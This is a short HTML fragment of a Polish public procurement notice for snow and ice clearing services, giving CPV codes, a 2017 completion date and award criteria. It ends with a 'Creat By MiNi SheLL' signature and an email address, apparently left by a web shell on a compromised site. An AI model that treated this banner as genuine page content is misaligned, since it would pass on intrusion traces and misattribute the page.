<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Liczba sprzętu w danej części (obwodzie) - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com